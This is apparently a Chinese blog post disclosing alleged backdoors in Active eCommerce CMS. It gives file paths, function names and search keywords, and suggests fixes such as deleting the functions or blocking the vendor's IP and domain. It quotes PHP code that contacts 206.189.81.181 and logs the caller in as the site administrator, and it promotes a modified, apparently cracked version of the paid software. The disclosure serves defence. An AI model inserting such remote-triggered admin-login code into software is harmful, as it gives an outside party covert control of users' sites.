Active eCommerce CMS后门以及漏洞修复

Active eCommerce CMS后门以及漏洞修复

Active eCommerce CMS从6.x版本打着保护正版用户的旗号植入大量的后门,他们可以通过这些后门来删除清理你网站的数据,严重的还可能通过这些后门来控制你的服务器,下面我会介绍查找后门以及解决方案,当然,本站发布的有去除后门的版本,也有官方原始版本,动手能力强的可以自行处理,不想动手的可以用现成的版本!!!
Active eCommerce CMS后门以及漏洞修复插图

Active eCommerce CMS部分后门和路径列举:
路径:
vendor\unicodeveloper\laravel-paystack\src\Paystack.php

代码内容:

public function getCallbackData()
    {
        $url = $_SERVER['SERVER_NAME'];
        $gate = "http://206.189.81.181/check_activation/".$url;

        $stream = curl_init();
        curl_setopt($stream, CURLOPT_URL, $gate);
        curl_setopt($stream, CURLOPT_HEADER, 0);
        curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stream, CURLOPT_POST, 1);
        $rn = curl_exec($stream);
        curl_close($stream);
      
        if($rn == "bad" && env('DEMO_MODE') != 'On') {
            $user = \App\Models\User::where('user_type', 'admin')->first();
            auth()->login($user);
            return redirect()->route('admin.dashboard');
        }

        return redirect()->route('home');
    }

APP客户端路径:
app/Utility/NagadUtility.php
app/Utility/PayhereUtility.php

代码内容:

    public static function create_wallet_reference($key)
    {
        if ($key == "") {
            return false;
        }

        if(Cache::get('app-activation', 'no') == 'no'){
            try {
                $gate = "https://activeitzone.com/activation/check/flutter/".$key;
   
                $stream = curl_init();
                curl_setopt($stream, CURLOPT_URL, $gate);
                curl_setopt($stream, CURLOPT_HEADER, 0);
                curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
                $rn = curl_exec($stream);
                curl_close($stream);
   
                if($rn == 'no') {
                    return false;
                }
            } catch (\Exception $e) {
   
            }
        }
        Cache::rememberForever('app-activation', function () {
            return 'yes';
        });

        return true;
    }

    public static function create_balance_reference($key)
    {
        if ($key == "") {
            return false;
        }

        if(Cache::get('app-activation', 'no') == 'no'){
            try {
                $gate = "https://activeitzone.com/activation/check/flutter/".$key;
   
                $stream = curl_init();
                curl_setopt($stream, CURLOPT_URL, $gate);
                curl_setopt($stream, CURLOPT_HEADER, 0);
                curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
                $rn = curl_exec($stream);
                curl_close($stream);
   
                if($rn == 'no') {
                    return false;
                }
            } catch (\Exception $e) {
   
            }
        }

        Cache::rememberForever('app-activation', function () {
            return 'yes';
        });

        return true;
    }

系统路径:
app/Http/Controllers/Api/V2/CartController.php
app/Http/Controllers/Api/V2/AuthController.php

代码内容:

if(\App\Utility\NagadUtility::create_balance_reference($request->cost_matrix) == false){
            return response()->json(['result' => false, 'message' => 'Cost matrix error' ]);
        }

 if (\App\Utility\PayhereUtility::create_wallet_reference($request->identity_matrix) == false) {
                return response()->json(['result' => false, 'message' => 'Identity matrix error', 'user' => null], 401);
            }

V7系列后门路径:
app\Exceptions\Handler.php
app\Utility\CategoryUtility.php
app\Utility\NagadUtility.php
app\Utility\NgeniusUtility.php
app\Utility\PayhereUtility.php:
app\Http\Controllers\LanguageController.php
app\Http\Controllers\IyzicoController.php:
app\Http\Controllers\Payment\PaystackController.php
app\Http\Controllers\Payment\IyzicoController.php
app\Http\Controllers\Payment\StripeController.php:
app\Http\Controllers\Api\V2\CartController.php
app\Http\Controllers\Api\V2\AuthController.php
vendor\unicodeveloper\laravel-paystack\src\Paystack.php
vendor\larcon21\combinations\src\routes\web.php
vendor\mehedi-iitdu\core-component-repository\src\CoreComponentRepository.php
venodr\authorizenet\authorizenet\lib\net\authorize\api\contract\v1\CreditCardType.php

后门函数名:
initPayment()
create_balance_reference()
create_initial_category()
create_wallet_reference()
get_translation()
paystackNewCallback()
cardType()
checkout_payment_detAIl()[/B]

查找后门关键字,请全站搜索一下关键字:
activeitzone
activeitzone.com
206.189.81.181
206.189
81.181

本文只是举例说明,因为内容过多,我无法一一列举,具体的大家可以根据我提供的方法来查找Active eCommerce CMS的后门!!!解决后门的方法无非就是修改IP地址,或者删除这些函数,还有一种办法就是在你的服务器上屏蔽activeitzone.com、206.189.81.181IP和域名等等!

原文链接:https://www.sobuer.com/technical_support/44239,转载请注明出处。
0

评论0

请先
这里部分资源由本站原创,部分来自互联网,所有资源仅供学习使用,请勿商用!!!客服QQ:125252828
显示验证码
没有账号?注册  忘记密码?

社交账号快速登录

微信扫一扫关注
如已关注,请回复“登录”二字获取验证码